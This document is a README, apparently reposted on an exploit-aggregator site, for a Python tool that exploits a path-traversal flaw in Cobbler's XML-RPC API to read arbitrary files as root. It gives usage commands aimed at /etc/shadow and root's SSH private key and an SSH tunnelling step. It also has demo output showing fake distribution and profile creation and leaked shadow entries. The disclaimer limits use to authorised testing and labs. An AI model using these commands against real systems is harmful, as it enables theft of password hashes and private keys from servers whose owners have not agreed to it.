Share
## https://sploitus.com/exploit?id=99121456-1822-5B60-9714-842FB605E9C1
# Cobbler XML-RPC Arbitrary File Read Exploit

![Python Version](https://img.shields.io/badge/python-3.x-blue.svg)
![License](https://img.shields.io/badge/license-MIT-green.svg)
![Platform](https://img.shields.io/badge/platform-linux-lightgrey.svg)

A Python exploit tool for reading arbitrary files through Cobbler's XML-RPC API vulnerability. This tool leverages improper input validation in Cobbler's `template_files` feature to read sensitive files with root privileges.

## ๐ŸŽฏ Overview

Cobbler is a Linux installation server that allows for rapid setup of network installation environments. This exploit targets a vulnerability in Cobbler's XML-RPC API (typically running on port 25151) where the `template_files` mapping feature doesn't properly validate file paths, allowing authenticated users to read arbitrary files on the system.

### Vulnerability Details

- **Affected Component:** Cobbler XML-RPC API
- **Vulnerability Type:** Arbitrary File Read / Path Traversal
- **Required Access:** Authenticated access to Cobbler API (or unauthenticated if misconfigured)
- **Impact:** Read any file on the system with root privileges
- **CVSS Score:** High (Information Disclosure leading to Privilege Escalation)

## โš ๏ธ Disclaimer

**FOR EDUCATIONAL PURPOSES ONLY**

This tool is provided for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse of this tool.

Only use this tool on:
- Systems you own
- Systems you have explicit written permission to test
- Authorized CTF/Lab environments (like Hack The Box)

## ๐Ÿ”ง Requirements

- Python 3.x
- `xmlrpc.client` (built-in)
- Network access to Cobbler XML-RPC API (port 25151)
- SSH access for port forwarding (if service is localhost-only)

## ๐Ÿš€ Usage

### Basic Usage

```bash
# Read a specific file
python3 exploit.py /etc/shadow

# Read root's SSH private key
python3 exploit.py /root/.ssh/id_rsa

```

### With SSH Port Forwarding

If Cobbler API is only accessible on localhost (127.0.0.1:25151):

```bash
# In Terminal 1: Establish SSH tunnel
ssh -L 25151:127.0.0.1:25151 user@target-host

# In Terminal 2: Run the exploit
python3 exploit.py /etc/shadow
```

### Interactive Mode

```bash
# Run without arguments for interactive mode
python3 exploit.py

# You'll be prompted:
# [?] Enter file path to read (e.g., /etc/shadow):
```

## ๐ŸŽฌ Demo

```bash
$ python3 exploit.py /etc/shadow

============================================================
  Cobbler Arbitrary File Read Exploit
============================================================

[*] Target file: /etc/shadow
[*] Connecting to Cobbler API...
[*] Logging in...
[*] Creating fake distribution...
[*] Creating fake profile...
[*] Mapping /etc/shadow -> /leak
[*] Syncing...
[+] Exploit setup complete!

============================================================
FILE: /etc/shadow
============================================================
root:$6$xyz...:19234:0:99999:7:::
daemon:*:19234:0:99999:7:::
...
============================================================
```